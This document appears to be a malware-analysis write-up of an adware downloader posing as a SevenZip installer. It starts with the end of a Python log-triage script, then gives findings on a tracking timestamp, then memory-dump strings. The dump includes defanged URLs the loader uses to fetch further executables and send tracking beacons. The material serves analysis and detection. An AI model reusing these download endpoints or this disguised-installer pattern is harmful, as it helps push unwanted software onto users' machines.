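            hits.append({"verdict": verdict, "host": entry["host"], **tracking_fields(entry)})
    return hits


def user_ids(hits: List[Dict[str, str]]) -> set:
    """The distinct user_id values: one GUID ties the beacons and the download together."""
    return {h["user_id"] for h in hits if "user_id" in h}


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

Run against the constructed lines, the script flags four of the five requests and leaves the unrelated browser request alone. The decoded timestamp, 2014-12-14T13:42:56Z, carries the same minute and second as the Date header of the response that delivered the loader (12:42:56 GMT), one hour apart, so the ts/sig pair was generated for this download rather than fixed at build time; the `sig` value itself is 32 hex digits and nothing on the page shows how it is derived.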
Map
The not-a-virus connects to the servers at the following location(s):
Strings from Dumps
run-setup.exe_1336:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\SevenZip_Setup.exe"
ip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
.vN {
({,{
.OQv]y
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
SevenZip_Setup.exe
SEVENZ~1.EXE
SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\ii_start.txt
evenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
ip_Setup.exe
taller5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
"D:\run-setup.exe"
run-setup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
D:\run-setup.exe
hXXp://secure.oi-installer5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
Nullsoft Install System v2.46
SevenZip_Setup.exe_928:
.text
`.rdata
@.data
.rsrc
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
InternetOpenUrlA
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
WININET.dll
KERNEL32.dll
USER32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
zcÃ
Program: C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\SevenZip_Setup.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\SevenZip_Setup.exe
77:,,.99;::
334//1;;=88:557
__`**,99;=((*
..0556;;=002
** 76754453252152/51-71-1,)::
)) 88:557668--/
##ˆ:55788:&&(
--.77999:'')
)),99:;;=--/
...yxxx
.lG!V
=U.bc=
.ECCC
;w.mmm
VVV.inkscape.org
43.jdbX
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
true
hXXp://secure.oi-installer5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?mode=dlshiftcombined&subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&&callback&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&browser=--&useragent=NSISDL/1.2 (Mozilla)
hXXp://secure.oi-installer5.com/validate/timestamp?ts=1418564576&sig=98F23C1CCEF11AAA52BBAB0B9031E99E
min.0.0.19
hXXp://secure.oinstaller6.com/o/7zip/setup.exe?&subid=self&tmpvar=00000000&mode=dlshift&adprovider=default
hXXp://imp.oi-imp4.com/impression.do/?event=
wininet.dll
Kernel32.dll
ntdll.dll
msvcrt.dll
10&referrer=%d
min_ldrf_exes
min_ldrf_exef
min_ldrf_rsrc_url
bs.exe
KERNEL32.DLL
mscoree.dll
2.4.8.1